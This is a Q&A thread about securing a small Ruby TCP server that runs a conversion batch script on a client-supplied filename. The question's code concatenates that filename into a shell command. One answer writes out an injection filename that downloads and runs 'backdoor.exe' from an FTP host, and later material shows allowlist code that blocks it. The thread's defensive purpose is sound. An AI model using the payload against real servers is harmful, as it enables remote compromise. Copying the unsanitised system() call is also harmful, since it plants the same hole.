Should I Take Security Measures for a Small, Single-Service Server?
I have some experience with programming, but I have very little experience when it comes to the security of programs. I've written a single-service server in Ruby which runs on a Windows XP computer to be used by a Linux computer in the same lab. The lab network is also behind a firewall, so there might not be a problem there, but I really have no idea. Below is the code for the server. All it does is take a .raw file, run msconvert.exe to convert it into an mzML file, and then send back the mzML file.
require 'socket'

server = TCPServer.open(2000)
loop {
  client = server.accept
  filename = client.gets.chomp
  puts "Reading contents of #{filename}.raw"
  raw_data = client.gets("\r\r\n\n").chomp("\r\r\n\n")
  File.open(filename + ".raw", 'wb') {|out| out.print raw_data}
  puts "Converting #{filename}"
  #It's lame to have a script run a script, but it's the only way to get this to work.
  system "scriptit.bat " + filename + ".raw"
  puts "Sending contents of #{filename}.mzML"
  client.print IO.read(filename + ".mzML")
  client.print "\r\r\n\n"
  puts "Done"
  client.close # Disconnect from the client
}
Should I do something to make this more secure, or do I not need to worry about it?
If an attacker supplies a filename
of || ftp ftp://host/backdoor.exe || backdoor.exe ||
he will be able to infect your server.
In order to patch this server you need to use Escape.shell_command().
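One way to close the hole described in the answer above, as an added example rather than code from the question or from any answer: it rejects any client-supplied name outside a strict allowlist before the name reaches File.open or system, instead of escaping it. SAFE_NAME, safe_basename, convert_command and check_samples are hypothetical names, and the sample inputs are constructed.

```ruby
# Added example: allowlist validation of the filename the client sends.

# Letters, digits, underscore, hyphen and dot only, starting with a letter or
# digit, at most 64 characters. Spaces, quotes, path separators and the
# cmd.exe metacharacters (| & < > ^ % ") can never match.
# \A and \z anchor the whole string; in Ruby ^ and $ only anchor a line,
# so "good\n|| bad" would pass a ^...$ pattern.
SAFE_NAME = /\A[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\z/

# Returns the name unchanged when it is acceptable, raises otherwise.
def safe_basename(name)
  name = name.to_s
  unless name.match?(SAFE_NAME) && !name.include?("..")
    raise ArgumentError, "rejected filename: #{name.inspect}"
  end
  name
end

# Builds the argument list for Kernel#system instead of one concatenated
# command string. A .bat file is still interpreted by cmd.exe, so the
# allowlist above is the control that matters; the list form only removes
# the string concatenation.
def convert_command(name)
  ["scriptit.bat", safe_basename(name) + ".raw"]
end

# Constructed sample inputs; the second is the string quoted in the answer.
SAMPLES = [
  "run_07.a",
  "|| ftp ftp://host/backdoor.exe || backdoor.exe ||",
  "..\\boot",
  "sample\n",
  ""
].freeze

# Maps each sample to the argument list that would be run, or :rejected.
def check_samples(samples = SAMPLES)
  samples.map { |s| [s, (convert_command(s) rescue :rejected)] }.to_h
end

check_samples.each { |input, result| puts "#{input.inspect} => #{result.inspect}" }
```

In the server loop this would replace the concatenated call with `system(*convert_command(filename))`, and the same `safe_basename(filename)` result would be used for the File.open and IO.read paths, closing the connection when ArgumentError is raised.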
Well, if your Windows server is only used by your lab computers, I would say it is sufficient if you configure the firewall so that nobody can access the server from the outside.
If the system is exposed to anything public (the internet, etc.) then security is very important. Some people really enjoy the challenge of breaking systems.